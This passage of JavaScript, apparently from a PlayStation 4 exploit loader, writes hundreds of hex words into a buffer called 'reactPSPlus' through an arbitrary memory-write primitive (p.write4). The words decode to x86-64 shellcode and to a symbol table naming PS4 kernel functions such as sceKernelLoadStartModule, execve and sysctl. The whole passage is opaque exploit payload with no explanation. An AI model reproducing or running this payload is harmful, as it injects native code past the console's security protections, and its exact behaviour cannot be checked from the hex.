317 | p.write4(reactPSPlus.add32(0x000004ec), 0x20b848d3);
318 | p.write4(reactPSPlus.add32(0x000004f0), 0x00000001);
319 | p.write4(reactPSPlus.add32(0x000004f4), 0x42000000);
320 | p.write4(reactPSPlus.add32(0x000004f8), 0x003d7c8b);
321 | p.write4(reactPSPlus.add32(0x000004fc), 0x07148d49);
322 | p.write4(reactPSPlus.add32(0x00000500), 0xfdfbb848);
323 | p.write4(reactPSPlus.add32(0x00000504), 0xffffffff);
324 | p.write4(reactPSPlus.add32(0x00000508), 0x8d49ffff);
325 | p.write4(reactPSPlus.add32(0x0000050c), 0xd3ff0734);
326 | p.write4(reactPSPlus.add32(0x00000510), 0x0060b848);
327 | p.write4(reactPSPlus.add32(0x00000514), 0x00000000);
328 | p.write4(reactPSPlus.add32(0x00000518), 0x8b420000);
329 | p.write4(reactPSPlus.add32(0x0000051c), 0x49003d7c);
330 | p.write4(reactPSPlus.add32(0x00000520), 0x4807148d);
331 | p.write4(reactPSPlus.add32(0x00000524), 0xfffe11b8);
332 | p.write4(reactPSPlus.add32(0x00000528), 0xffffffff);
333 | p.write4(reactPSPlus.add32(0x0000052c), 0x348d49ff);
334 | p.write4(reactPSPlus.add32(0x00000530), 0x48d3ff07);
335 | p.write4(reactPSPlus.add32(0x00000534), 0x000020b8);
336 | p.write4(reactPSPlus.add32(0x00000538), 0x00000000);
337 | p.write4(reactPSPlus.add32(0x0000053c), 0x7c8b4200);
338 | p.write4(reactPSPlus.add32(0x00000540), 0x8d49003d);
339 | p.write4(reactPSPlus.add32(0x00000544), 0xb8480714);
340 | p.write4(reactPSPlus.add32(0x00000548), 0xfffffe18);
341 | p.write4(reactPSPlus.add32(0x0000054c), 0xffffffff);
342 | p.write4(reactPSPlus.add32(0x00000550), 0x07348d49);
343 | p.write4(reactPSPlus.add32(0x00000554), 0xb848d3ff);
344 | p.write4(reactPSPlus.add32(0x00000558), 0x00000040);
345 | p.write4(reactPSPlus.add32(0x0000055c), 0x00000000);
346 | p.write4(reactPSPlus.add32(0x00000560), 0x3d7c8b42);
347 | p.write4(reactPSPlus.add32(0x00000564), 0x148d4900);
348 | p.write4(reactPSPlus.add32(0x00000568), 0x1fb84807);
349 | p.write4(reactPSPlus.add32(0x0000056c), 0xfffffffe);
350 | p.write4(reactPSPlus.add32(0x00000570), 0x49ffffff);
351 | p.write4(reactPSPlus.add32(0x00000574), 0xff07348d);
352 | p.write4(reactPSPlus.add32(0x00000578), 0x18b848d3);
353 | p.write4(reactPSPlus.add32(0x0000057c), 0x00000001);
354 | p.write4(reactPSPlus.add32(0x00000580), 0x42000000);
355 | p.write4(reactPSPlus.add32(0x00000584), 0x003d7c8b);
356 | p.write4(reactPSPlus.add32(0x00000588), 0x07148d49);
357 | p.write4(reactPSPlus.add32(0x0000058c), 0xfe26b848);
358 | p.write4(reactPSPlus.add32(0x00000590), 0xffffffff);
359 | p.write4(reactPSPlus.add32(0x00000594), 0x8d49ffff);
360 | p.write4(reactPSPlus.add32(0x00000598), 0xd3ff0734);
361 | p.write4(reactPSPlus.add32(0x0000059c), 0x00a8b848);
362 | p.write4(reactPSPlus.add32(0x000005a0), 0x00000000);
363 | p.write4(reactPSPlus.add32(0x000005a4), 0x8b420000);
364 | p.write4(reactPSPlus.add32(0x000005a8), 0x49003d7c);
365 | p.write4(reactPSPlus.add32(0x000005ac), 0x4807148d);
366 | p.write4(reactPSPlus.add32(0x000005b0), 0xfffe2db8);
367 | p.write4(reactPSPlus.add32(0x000005b4), 0xffffffff);
368 | p.write4(reactPSPlus.add32(0x000005b8), 0x348d49ff);
369 | p.write4(reactPSPlus.add32(0x000005bc), 0x48d3ff07);
370 | p.write4(reactPSPlus.add32(0x000005c0), 0x0000e0b8);
371 | p.write4(reactPSPlus.add32(0x000005c4), 0x00000000);
372 | p.write4(reactPSPlus.add32(0x000005c8), 0x7c8b4200);
373 | p.write4(reactPSPlus.add32(0x000005cc), 0x8d49003d);
374 | p.write4(reactPSPlus.add32(0x000005d0), 0xb8480714);
375 | p.write4(reactPSPlus.add32(0x000005d4), 0xfffffe34);
376 | p.write4(reactPSPlus.add32(0x000005d8), 0xffffffff);
377 | p.write4(reactPSPlus.add32(0x000005dc), 0x07348d49);
378 | p.write4(reactPSPlus.add32(0x000005e0), 0xb848d3ff);
379 | p.write4(reactPSPlus.add32(0x000005e4), 0x00000098);
380 | p.write4(reactPSPlus.add32(0x000005e8), 0x00000000);
381 | p.write4(reactPSPlus.add32(0x000005ec), 0x3d7c8b42);
382 | p.write4(reactPSPlus.add32(0x000005f0), 0x148d4900);
383 | p.write4(reactPSPlus.add32(0x000005f4), 0xc4834807);
384 | p.write4(reactPSPlus.add32(0x000005f8), 0x3db84808);
385 | p.write4(reactPSPlus.add32(0x000005fc), 0xfffffffe);
386 | p.write4(reactPSPlus.add32(0x00000600), 0x49ffffff);
387 | p.write4(reactPSPlus.add32(0x00000604), 0x4807348d);
388 | p.write4(reactPSPlus.add32(0x00000608), 0x5d5bd889);
389 | p.write4(reactPSPlus.add32(0x0000060c), 0x5f415c41);
390 | p.write4(reactPSPlus.add32(0x00000610), 0x0f66e0ff);
391 | p.write4(reactPSPlus.add32(0x00000614), 0x0000441f);
392 | p.write4(reactPSPlus.add32(0x00000618), 0xfc16b848);
393 | p.write4(reactPSPlus.add32(0x0000061c), 0xffffffff);
394 | p.write4(reactPSPlus.add32(0x00000620), 0x8d4affff);
395 | p.write4(reactPSPlus.add32(0x00000624), 0x49003d74);
396 | p.write4(reactPSPlus.add32(0x00000628), 0xff073c8d);
397 | p.write4(reactPSPlus.add32(0x0000062c), 0x0fc085d3);
398 | p.write4(reactPSPlus.add32(0x00000630), 0xfffb2784);
399 | p.write4(reactPSPlus.add32(0x00000634), 0x29b848ff);
400 | p.write4(reactPSPlus.add32(0x00000638), 0xfffffffc);
401 | p.write4(reactPSPlus.add32(0x0000063c), 0x4affffff);
402 | p.write4(reactPSPlus.add32(0x00000640), 0x003d748d);
403 | p.write4(reactPSPlus.add32(0x00000644), 0x073c8d49);
404 | p.write4(reactPSPlus.add32(0x00000648), 0x0de9d3ff);
405 | p.write4(reactPSPlus.add32(0x0000064c), 0x90fffffb);
406 | p.write4(reactPSPlus.add32(0x00000650), 0x4fc0c748);
407 | p.write4(reactPSPlus.add32(0x00000654), 0xe9000002);
408 | p.write4(reactPSPlus.add32(0x00000658), 0xfffffa49);
409 | p.write4(reactPSPlus.add32(0x0000065c), 0x50c0c748);
410 | p.write4(reactPSPlus.add32(0x00000660), 0xe9000002);
411 | p.write4(reactPSPlus.add32(0x00000664), 0xfffffa3d);
412 | p.write4(reactPSPlus.add32(0x00000668), 0x00841f0f);
413 | p.write4(reactPSPlus.add32(0x0000066c), 0x00000000);
414 | p.write4(reactPSPlus.add32(0x00000670), 0x0530bb49);
415 | p.write4(reactPSPlus.add32(0x00000674), 0x00000000);
416 | p.write4(reactPSPlus.add32(0x00000678), 0x8d480000);
417 | p.write4(reactPSPlus.add32(0x0000067c), 0xffffef0d);
418 | p.write4(reactPSPlus.add32(0x00000680), 0x4c5741ff);
419 | p.write4(reactPSPlus.add32(0x00000684), 0xc748d901);
420 | p.write4(reactPSPlus.add32(0x00000688), 0x00016006);
421 | p.write4(reactPSPlus.add32(0x0000068c), 0x02b84900);
422 | p.write4(reactPSPlus.add32(0x00000690), 0xfffffff5);
423 | p.write4(reactPSPlus.add32(0x00000694), 0x48ffffff);
424 | p.write4(reactPSPlus.add32(0x00000698), 0x8949f289);
425 | p.write4(reactPSPlus.add32(0x0000069c), 0x31fe89cf);
426 | p.write4(reactPSPlus.add32(0x000006a0), 0x0251bfc0);
427 | p.write4(reactPSPlus.add32(0x000006a4), 0x01490000);
428 | p.write4(reactPSPlus.add32(0x000006a8), 0xd0ff41c8);
429 | p.write4(reactPSPlus.add32(0x000006ac), 0x90c35f41);
430 | p.write4(reactPSPlus.add32(0x000006b0), 0x04f0bb49);
431 | p.write4(reactPSPlus.add32(0x000006b4), 0x00000000);
432 | p.write4(reactPSPlus.add32(0x000006b8), 0x8d4c0000);
433 | p.write4(reactPSPlus.add32(0x000006bc), 0xffffef0d);
434 | p.write4(reactPSPlus.add32(0x000006c0), 0xd9014dff);
435 | p.write4(reactPSPlus.add32(0x000006c4), 0xf502ba49);
436 | p.write4(reactPSPlus.add32(0x000006c8), 0xffffffff);
437 | p.write4(reactPSPlus.add32(0x000006cc), 0x5741ffff);
438 | p.write4(reactPSPlus.add32(0x000006d0), 0x4df18948);
439 | p.write4(reactPSPlus.add32(0x000006d4), 0x8948cf89);
440 | p.write4(reactPSPlus.add32(0x000006d8), 0xc03145fe);
441 | p.write4(reactPSPlus.add32(0x000006dc), 0x52bfd231);
442 | p.write4(reactPSPlus.add32(0x000006e0), 0x31000002);
443 | p.write4(reactPSPlus.add32(0x000006e4), 0xca014dc0);
444 | p.write4(reactPSPlus.add32(0x000006e8), 0x41d2ff41);
445 | p.write4(reactPSPlus.add32(0x000006ec), 0x9066c35f);
446 | p.write4(reactPSPlus.add32(0x000006f0), 0x04b0bb49);
447 | p.write4(reactPSPlus.add32(0x000006f4), 0x00000000);
448 | p.write4(reactPSPlus.add32(0x000006f8), 0x8d4c0000);
449 | p.write4(reactPSPlus.add32(0x000006fc), 0xffffef05);
450 | p.write4(reactPSPlus.add32(0x00000700), 0xd8014dff);
451 | p.write4(reactPSPlus.add32(0x00000704), 0xf502b949);
452 | p.write4(reactPSPlus.add32(0x00000708), 0xffffffff);
453 | p.write4(reactPSPlus.add32(0x0000070c), 0x5741ffff);
454 | p.write4(reactPSPlus.add32(0x00000710), 0x894dfe89);
455 | p.write4(reactPSPlus.add32(0x00000714), 0x31c931c7);
456 | p.write4(reactPSPlus.add32(0x00000718), 0x0253bfd2);
457 | p.write4(reactPSPlus.add32(0x0000071c), 0xc0310000);
458 | p.write4(reactPSPlus.add32(0x00000720), 0x41c1014d);
459 | p.write4(reactPSPlus.add32(0x00000724), 0x5f41d1ff);
460 | p.write4(reactPSPlus.add32(0x00000728), 0x801f0fc3);
461 | p.write4(reactPSPlus.add32(0x0000072c), 0x00000000);
462 | p.write4(reactPSPlus.add32(0x00000730), 0xbb495741);
463 | p.write4(reactPSPlus.add32(0x00000734), 0x00000470);
464 | p.write4(reactPSPlus.add32(0x00000738), 0x00000000);
465 | p.write4(reactPSPlus.add32(0x0000073c), 0x1d8d4853);
466 | p.write4(reactPSPlus.add32(0x00000740), 0xffffffec);
467 | p.write4(reactPSPlus.add32(0x00000744), 0x48db014c);
468 | p.write4(reactPSPlus.add32(0x00000748), 0xfffff8b8);
469 | p.write4(reactPSPlus.add32(0x0000074c), 0xffffffff);
470 | p.write4(reactPSPlus.add32(0x00000750), 0xec8348ff);
471 | p.write4(reactPSPlus.add32(0x00000754), 0x048b4808);
472 | p.write4(reactPSPlus.add32(0x00000758), 0x46bf4803);
473 | p.write4(reactPSPlus.add32(0x0000075c), 0xfffffffe);
474 | p.write4(reactPSPlus.add32(0x00000760), 0x48ffffff);
475 | p.write4(reactPSPlus.add32(0x00000764), 0xc931df01);
476 | p.write4(reactPSPlus.add32(0x00000768), 0xf631d231);
477 | p.write4(reactPSPlus.add32(0x0000076c), 0x45c93145);
478 | p.write4(reactPSPlus.add32(0x00000770), 0x10ffc031);
479 | p.write4(reactPSPlus.add32(0x00000774), 0x08c48348);
480 | p.write4(reactPSPlus.add32(0x00000778), 0x0130ba48);
481 | p.write4(reactPSPlus.add32(0x0000077c), 0x00000000);
482 | p.write4(reactPSPlus.add32(0x00000780), 0xb9480000);
483 | p.write4(reactPSPlus.add32(0x00000784), 0xfffffe5b);
484 | p.write4(reactPSPlus.add32(0x00000788), 0xffffffff);
485 | p.write4(reactPSPlus.add32(0x0000078c), 0xb848c789);
486 | p.write4(reactPSPlus.add32(0x00000790), 0xfffffab0);
487 | p.write4(reactPSPlus.add32(0x00000794), 0xffffffff);
488 | p.write4(reactPSPlus.add32(0x00000798), 0x48da0148);
489 | p.write4(reactPSPlus.add32(0x0000079c), 0x480b348d);
490 | p.write4(reactPSPlus.add32(0x000007a0), 0x415bd801);
491 | p.write4(reactPSPlus.add32(0x000007a4), 0x6ce0ff5f);
492 | p.write4(reactPSPlus.add32(0x000007a8), 0x656b6269);
493 | p.write4(reactPSPlus.add32(0x000007ac), 0x6c656e72);
494 | p.write4(reactPSPlus.add32(0x000007b0), 0x7270732e);
495 | p.write4(reactPSPlus.add32(0x000007b4), 0x696c0078);
496 | p.write4(reactPSPlus.add32(0x000007b8), 0x72656b62);
497 | p.write4(reactPSPlus.add32(0x000007bc), 0x5f6c656e);
498 | p.write4(reactPSPlus.add32(0x000007c0), 0x2e626577);
499 | p.write4(reactPSPlus.add32(0x000007c4), 0x78727073);
500 | p.write4(reactPSPlus.add32(0x000007c8), 0x62696c00);
501 | p.write4(reactPSPlus.add32(0x000007cc), 0x6e72656b);
502 | p.write4(reactPSPlus.add32(0x000007d0), 0x735f6c65);
503 | p.write4(reactPSPlus.add32(0x000007d4), 0x732e7379);
504 | p.write4(reactPSPlus.add32(0x000007d8), 0x00787270);
505 | p.write4(reactPSPlus.add32(0x000007dc), 0x74735f5f);
506 | p.write4(reactPSPlus.add32(0x000007e0), 0x5f6b6361);
507 | p.write4(reactPSPlus.add32(0x000007e4), 0x5f6b6863);
508 | p.write4(reactPSPlus.add32(0x000007e8), 0x72617567);
509 | p.write4(reactPSPlus.add32(0x000007ec), 0x5f5f0064);
510 | p.write4(reactPSPlus.add32(0x000007f0), 0x63617473);
511 | p.write4(reactPSPlus.add32(0x000007f4), 0x68635f6b);
512 | p.write4(reactPSPlus.add32(0x000007f8), 0x61665f6b);
513 | p.write4(reactPSPlus.add32(0x000007fc), 0x5f006c69);
514 | p.write4(reactPSPlus.add32(0x00000800), 0x7272655f);
515 | p.write4(reactPSPlus.add32(0x00000804), 0x7300726f);
516 | p.write4(reactPSPlus.add32(0x00000808), 0x654b6563);
517 | p.write4(reactPSPlus.add32(0x0000080c), 0x6c656e72);
518 | p.write4(reactPSPlus.add32(0x00000810), 0x6f727245);
519 | p.write4(reactPSPlus.add32(0x00000814), 0x63730072);
520 | p.write4(reactPSPlus.add32(0x00000818), 0x72654b65);
521 | p.write4(reactPSPlus.add32(0x0000081c), 0x4c6c656e);
522 | p.write4(reactPSPlus.add32(0x00000820), 0x5364616f);
523 | p.write4(reactPSPlus.add32(0x00000824), 0x74726174);
524 | p.write4(reactPSPlus.add32(0x00000828), 0x75646f4d);
525 | p.write4(reactPSPlus.add32(0x0000082c), 0x7300656c);
526 | p.write4(reactPSPlus.add32(0x00000830), 0x654b6563);
527 | p.write4(reactPSPlus.add32(0x00000834), 0x6c656e72);
528 | p.write4(reactPSPlus.add32(0x00000838), 0x6f6c6c41);
529 | p.write4(reactPSPlus.add32(0x0000083c), 0x65746163);
530 | p.write4(reactPSPlus.add32(0x00000840), 0x65726944);
531 | p.write4(reactPSPlus.add32(0x00000844), 0x654d7463);
532 | p.write4(reactPSPlus.add32(0x00000848), 0x79726f6d);
533 | p.write4(reactPSPlus.add32(0x0000084c), 0x65637300);
534 | p.write4(reactPSPlus.add32(0x00000850), 0x6e72654b);
535 | p.write4(reactPSPlus.add32(0x00000854), 0x614d6c65);
536 | p.write4(reactPSPlus.add32(0x00000858), 0x72694470);
537 | p.write4(reactPSPlus.add32(0x0000085c), 0x4d746365);
538 | p.write4(reactPSPlus.add32(0x00000860), 0x726f6d65);
539 | p.write4(reactPSPlus.add32(0x00000864), 0x63730079);
540 | p.write4(reactPSPlus.add32(0x00000868), 0x72654b65);
541 | p.write4(reactPSPlus.add32(0x0000086c), 0x536c656e);
542 | p.write4(reactPSPlus.add32(0x00000870), 0x00746174);
543 | p.write4(reactPSPlus.add32(0x00000874), 0x4b656373);
544 | p.write4(reactPSPlus.add32(0x00000878), 0x656e7265);
545 | p.write4(reactPSPlus.add32(0x0000087c), 0x65704f6c);
546 | p.write4(reactPSPlus.add32(0x00000880), 0x6373006e);
547 | p.write4(reactPSPlus.add32(0x00000884), 0x72654b65);
548 | p.write4(reactPSPlus.add32(0x00000888), 0x526c656e);
549 | p.write4(reactPSPlus.add32(0x0000088c), 0x00646165);
550 | p.write4(reactPSPlus.add32(0x00000890), 0x4b656373);
551 | p.write4(reactPSPlus.add32(0x00000894), 0x656e7265);
552 | p.write4(reactPSPlus.add32(0x00000898), 0x65734c6c);
553 | p.write4(reactPSPlus.add32(0x0000089c), 0x73006b65);
554 | p.write4(reactPSPlus.add32(0x000008a0), 0x654b6563);
555 | p.write4(reactPSPlus.add32(0x000008a4), 0x6c656e72);
556 | p.write4(reactPSPlus.add32(0x000008a8), 0x736f6c43);
557 | p.write4(reactPSPlus.add32(0x000008ac), 0x63730065);
558 | p.write4(reactPSPlus.add32(0x000008b0), 0x72654b65);
559 | p.write4(reactPSPlus.add32(0x000008b4), 0x536c656e);
560 | p.write4(reactPSPlus.add32(0x000008b8), 0x7065656c);
561 | p.write4(reactPSPlus.add32(0x000008bc), 0x65637300);
562 | p.write4(reactPSPlus.add32(0x000008c0), 0x6e72654b);
563 | p.write4(reactPSPlus.add32(0x000008c4), 0x73556c65);
564 | p.write4(reactPSPlus.add32(0x000008c8), 0x7065656c);
565 | p.write4(reactPSPlus.add32(0x000008cc), 0x65637300);
566 | p.write4(reactPSPlus.add32(0x000008d0), 0x6e72654b);
567 | p.write4(reactPSPlus.add32(0x000008d4), 0x65476c65);
568 | p.write4(reactPSPlus.add32(0x000008d8), 0x6d697474);
569 | p.write4(reactPSPlus.add32(0x000008dc), 0x64666f65);
570 | p.write4(reactPSPlus.add32(0x000008e0), 0x73007961);
571 | p.write4(reactPSPlus.add32(0x000008e4), 0x654b6563);
572 | p.write4(reactPSPlus.add32(0x000008e8), 0x6c656e72);
573 | p.write4(reactPSPlus.add32(0x000008ec), 0x50746547);
574 | p.write4(reactPSPlus.add32(0x000008f0), 0x65636f72);
575 | p.write4(reactPSPlus.add32(0x000008f4), 0x69547373);
576 | p.write4(reactPSPlus.add32(0x000008f8), 0x7300656d);
577 | p.write4(reactPSPlus.add32(0x000008fc), 0x654b6563);
578 | p.write4(reactPSPlus.add32(0x00000900), 0x6c656e72);
579 | p.write4(reactPSPlus.add32(0x00000904), 0x43746547);
580 | p.write4(reactPSPlus.add32(0x00000908), 0x65727275);
581 | p.write4(reactPSPlus.add32(0x0000090c), 0x7043746e);
582 | p.write4(reactPSPlus.add32(0x00000910), 0x79730075);
583 | p.write4(reactPSPlus.add32(0x00000914), 0x6c746373);
584 | p.write4(reactPSPlus.add32(0x00000918), 0x73797300);
585 | p.write4(reactPSPlus.add32(0x0000091c), 0x626c7463);
586 | p.write4(reactPSPlus.add32(0x00000920), 0x6d616e79);
587 | p.write4(reactPSPlus.add32(0x00000924), 0x79730065);
588 | p.write4(reactPSPlus.add32(0x00000928), 0x63726173);
589 | p.write4(reactPSPlus.add32(0x0000092c), 0x78650068);
590 | p.write4(reactPSPlus.add32(0x00000930), 0x65766365);
591 | p.write4(reactPSPlus.add32(0x00000934), 0x68747000);
592 | p.write4(reactPSPlus.add32(0x00000938), 0x64616572);
593 | p.write4(reactPSPlus.add32(0x0000093c), 0x6c65735f);
594 | p.write4(reactPSPlus.add32(0x00000940), 0x74700066);
595 | p.write4(reactPSPlus.add32(0x00000944), 0x61657268);
596 | p.write4(reactPSPlus.add32(0x00000948), 0x65735f64);
597 | p.write4(reactPSPlus.add32(0x0000094c), 0x66666174);
598 | p.write4(reactPSPlus.add32(0x00000950), 0x74696e69);
599 | p.write4(reactPSPlus.add32(0x00000954), 0x706e5f79);
600 | p.write4(reactPSPlus.add32(0x00000958), 0x65637300);
601 | p.write4(reactPSPlus.add32(0x0000095c), 0x6e72654b);
602 | p.write4(reactPSPlus.add32(0x00000960), 0x72436c65);
603 | p.write4(reactPSPlus.add32(0x00000964), 0x65746165);
604 | p.write4(reactPSPlus.add32(0x00000968), 0x65757145);
605 | p.write4(reactPSPlus.add32(0x0000096c), 0x73006575);
606 | p.write4(reactPSPlus.add32(0x00000970), 0x654b6563);
607 | p.write4(reactPSPlus.add32(0x00000974), 0x6c656e72);
608 | p.write4(reactPSPlus.add32(0x00000978), 0x656c6544);
609 | p.write4(reactPSPlus.add32(0x0000097c), 0x71456574);
610 | p.write4(reactPSPlus.add32(0x00000980), 0x65756575);
611 | p.write4(reactPSPlus.add32(0x00000984), 0x65637300);
612 | p.write4(reactPSPlus.add32(0x00000988), 0x6e72654b);
613 | p.write4(reactPSPlus.add32(0x0000098c), 0x64416c65);
614 | p.write4(reactPSPlus.add32(0x00000990), 0x65735564);
615 | p.write4(reactPSPlus.add32(0x00000994), 0x65764572);
616 | p.write4(reactPSPlus.add32(0x00000998), 0x7300746e);
617 | p.write4(reactPSPlus.add32(0x0000099c), 0x654b6563);
618 | p.write4(reactPSPlus.add32(0x000009a0), 0x6c656e72);
619 | p.write4(reactPSPlus.add32(0x000009a4), 0x52646441);
620 | p.write4(reactPSPlus.add32(0x000009a8), 0x45646165);
621 | p.write4(reactPSPlus.add32(0x000009ac), 0x746e6576);
622 | p.write4(reactPSPlus.add32(0x000009b0), 0x74656700);
623 | p.write4(reactPSPlus.add32(0x000009b4), 0x00646975);
624 | p.write4(reactPSPlus.add32(0x000009b8), 0x67746567);
625 | p.write4(reactPSPlus.add32(0x000009bc), 0x67006469);
626 | p.write4(reactPSPlus.add32(0x000009c0), 0x69707465);
627 | p.write4(reactPSPlus.add32(0x000009c4), 0x65730064);
628 | p.write4(reactPSPlus.add32(0x000009c8), 0x64697574);
629 | p.write4(reactPSPlus.add32(0x000009cc), 0x74657300);
630 | p.write4(reactPSPlus.add32(0x000009d0), 0x00646967);
631 | p.write4(reactPSPlus.add32(0x000009d4), 0x72746573);
632 | p.write4(reactPSPlus.add32(0x000009d8), 0x64697565);
633 | p.write4(reactPSPlus.add32(0x000009dc), 0x74657300);
634 | p.write4(reactPSPlus.add32(0x000009e0), 0x69676572);
635 | p.write4(reactPSPlus.add32(0x000009e4), 0x696c0064);
636 | p.write4(reactPSPlus.add32(0x000009e8), 0x65635362);
637 | p.write4(reactPSPlus.add32(0x000009ec), 0x6d737953);
638 | p.write4(reactPSPlus.add32(0x000009f0), 0x6c75646f);
639 | p.write4(reactPSPlus.add32(0x000009f4), 0x70732e65);
640 | p.write4(reactPSPlus.add32(0x000009f8), 0x73007872);
641 | p.write4(reactPSPlus.add32(0x000009fc), 0x79536563);
642 | p.write4(reactPSPlus.add32(0x00000a00), 0x646f6d73);
643 | p.write4(reactPSPlus.add32(0x00000a04), 0x4c656c75);
644 | p.write4(reactPSPlus.add32(0x00000a08), 0x4d64616f);
645 | p.write4(reactPSPlus.add32(0x00000a0c), 0x6c75646f);
646 | p.write4(reactPSPlus.add32(0x00000a10), 0x6c2f0065);
647 | p.write4(reactPSPlus.add32(0x00000a14), 0x34366269);
648 | p.write4(reactPSPlus.add32(0x00000a18), 0x2d646c2f);
649 | p.write4(reactPSPlus.add32(0x00000a1c), 0x756e696c);
650 | p.write4(reactPSPlus.add32(0x00000a20), 0x38782d78);
651 | p.write4(reactPSPlus.add32(0x00000a24), 0x34362d36);
652 | p.write4(reactPSPlus.add32(0x00000a28), 0x2e6f732e);
653 | p.write4(reactPSPlus.add32(0x00000a2c), 0x00000032);
654 | p.write4(reactPSPlus.add32(0x00000a30), 0x00000000);
655 | p.write4(reactPSPlus.add32(0x00000a34), 0x00000000);
656 | p.write4(reactPSPlus.add32(0x00000a38), 0x00000000);
657 | p.write4(reactPSPlus.add32(0x00000a3c), 0x00000000);
658 | p.write4(reactPSPlus.add32(0x00000a40), 0x00000000);
659 | p.write4(reactPSPlus.add32(0x00000a44), 0x00000000);
660 | p.write4(reactPSPlus.add32(0x00000a48), 0x00000000);
661 | p.write4(reactPSPlus.add32(0x00000a4c), 0x00000000);
662 | p.write4(reactPSPlus.add32(0x00000a50), 0x00000001);
663 | p.write4(reactPSPlus.add32(0x00000a54), 0x00000001);
664 | p.write4(reactPSPlus.add32(0x00000a58), 0x00000001);
665 | p.write4(reactPSPlus.add32(0x00000a5c), 0x00000000);
666 | p.write4(reactPSPlus.add32(0x00000a60), 0x00000000);
667 | p.write4(reactPSPlus.add32(0x00000a64), 0x00000000);
668 | p.write4(reactPSPlus.add32(0x00000a68), 0x00000000);
669 | p.write4(reactPSPlus.add32(0x00000a6c), 0x00000000);
670 | p.write4(reactPSPlus.add32(0x00000a70), 0x26200b98);
671 | p.write4(reactPSPlus.add32(0x00000a74), 0x00000009);
672 | p.write4(reactPSPlus.add32(0x00000a78), 0x00000008);
673 | p.write4(reactPSPlus.add32(0x00000a7c), 0x00000000);
674 | p.write4(reactPSPlus.add32(0x00000a80), 0x26200c60);
675 | p.write4(reactPSPlus.add32(0x00000a84), 0x00000009);
676 | p.write4(reactPSPlus.add32(0x00000a88), 0x6ffffef5);
677 | p.write4(reactPSPlus.add32(0x00000a8c), 0x00000000);
678 | p.write4(reactPSPlus.add32(0x00000a90), 0x26200a50);
679 | p.write4(reactPSPlus.add32(0x00000a94), 0x00000009);
680 | p.write4(reactPSPlus.add32(0x00000a98), 0x00000005);
681 | p.write4(reactPSPlus.add32(0x00000a9c), 0x00000000);
682 | p.write4(reactPSPlus.add32(0x00000aa0), 0x26200a48);
683 | p.write4(reactPSPlus.add32(0x00000aa4), 0x00000009);
684 | p.write4(reactPSPlus.add32(0x00000aa8), 0x00000006);
685 | p.write4(reactPSPlus.add32(0x00000aac), 0x00000000);
686 | p.write4(reactPSPlus.add32(0x00000ab0), 0x26200a30);
687 | p.write4(reactPSPlus.add32(0x00000ab4), 0x00000009);
688 | p.write4(reactPSPlus.add32(0x00000ab8), 0x0000000a);
689 | p.write4(reactPSPlus.add32(0x00000abc), 0x00000000);
690 | p.write4(reactPSPlus.add32(0x00000ac0), 0x00000001);
691 | p.write4(reactPSPlus.add32(0x00000ac4), 0x00000000);
692 | p.write4(reactPSPlus.add32(0x00000ac8), 0x0000000b);
693 | p.write4(reactPSPlus.add32(0x00000acc), 0x00000000);
694 | p.write4(reactPSPlus.add32(0x00000ad0), 0x00000018);
695 | p.write4(reactPSPlus.add32(0x00000ad4), 0x00000000);
696 | p.write4(reactPSPlus.add32(0x00000ad8), 0x00000015);
697 | p.write4(reactPSPlus.add32(0x00000adc), 0x00000000);
698 | p.write4(reactPSPlus.add32(0x00000ae0), 0x00000000);
699 | p.write4(reactPSPlus.add32(0x00000ae4), 0x00000000);
700 | p.write4(reactPSPlus.add32(0x00000ae8), 0x00000007);
701 | p.write4(reactPSPlus.add32(0x00000aec), 0x00000000);
702 | p.write4(reactPSPlus.add32(0x00000af0), 0x26200a70);
703 | p.write4(reactPSPlus.add32(0x00000af4), 0x00000009);
704 | p.write4(reactPSPlus.add32(0x00000af8), 0x00000008);
705 | p.write4(reactPSPlus.add32(0x00000afc), 0x00000000);
706 | p.write4(reactPSPlus.add32(0x00000b00), 0x00000018);
707 | p.write4(reactPSPlus.add32(0x00000b04), 0x00000000);
708 | p.write4(reactPSPlus.add32(0x00000b08), 0x00000009);
709 | p.write4(reactPSPlus.add32(0x00000b0c), 0x00000000);
710 | p.write4(reactPSPlus.add32(0x00000b10), 0x00000018);
711 | p.write4(reactPSPlus.add32(0x00000b14), 0x00000000);
712 | p.write4(reactPSPlus.add32(0x00000b18), 0x0000001e);
713 | p.write4(reactPSPlus.add32(0x00000b1c), 0x00000000);
714 | p.write4(reactPSPlus.add32(0x00000b20), 0x00000008);
715 | p.write4(reactPSPlus.add32(0x00000b24), 0x00000000);
716 | p.write4(reactPSPlus.add32(0x00000b28), 0x6ffffffb);
717 | p.write4(reactPSPlus.add32(0x00000b2c), 0x00000000);
718 | p.write4(reactPSPlus.add32(0x00000b30), 0x08000001);
719 | p.write4(reactPSPlus.add32(0x00000b34), 0x00000000);
720 | p.write4(reactPSPlus.add32(0x00000b38), 0x6ffffff9);
721 | p.write4(reactPSPlus.add32(0x00000b3c), 0x00000000);
722 | p.write4(reactPSPlus.add32(0x00000b40), 0x00000001);
723 | p.write4(reactPSPlus.add32(0x00000b44), 0x00000000);
724 | p.write4(reactPSPlus.add32(0x00000b48), 0x00000000);
725 | p.write4(reactPSPlus.add32(0x00000b4c), 0x00000000);
726 | p.write4(reactPSPlus.add32(0x00000b50), 0x00000000);
727 | p.write4(reactPSPlus.add32(0x00000b54), 0x00000000);
728 | p.write4(reactPSPlus.add32(0x00000b58), 0x00000000);
729 | p.write4(reactPSPlus.add32(0x00000b5c), 0x00000000);
730 | p.write4(reactPSPlus.add32(0x00000b60), 0x00000000);
731 | p.write4(reactPSPlus.add32(0x00000b64), 0x00000000);
732 | p.write4(reactPSPlus.add32(0x00000b68), 0x00000000);
733 | p.write4(reactPSPlus.add32(0x00000b6c), 0x00000000);
734 | p.write4(reactPSPlus.add32(0x00000b70), 0x00000000);
735 | p.write4(reactPSPlus.add32(0x00000b74), 0x00000000);
736 | p.write4(reactPSPlus.add32(0x00000b78), 0x00000000);
737 | p.write4(reactPSPlus.add32(0x00000b7c), 0x00000000);
738 | p.write4(reactPSPlus.add32(0x00000b80), 0x00000000);
739 | p.write4(reactPSPlus.add32(0x00000b84), 0x00000000);
740 | p.write4(reactPSPlus.add32(0x00000b88), 0x00000000);
741 | p.write4(reactPSPlus.add32(0x00000b8c), 0x00000000);
742 | p.write4(reactPSPlus.add32(0x00000b90), 0x00000000);
743 | p.write4(reactPSPlus.add32(0x00000b94), 0x00000000);
744 | p.write4(reactPSPlus.add32(0x00000b98), 0x26200c60);
745 | p.write4(reactPSPlus.add32(0x00000b9c), 0x00000009);
746 | p.write4(reactPSPlus.add32(0x00000ba0), 0x26200a88);
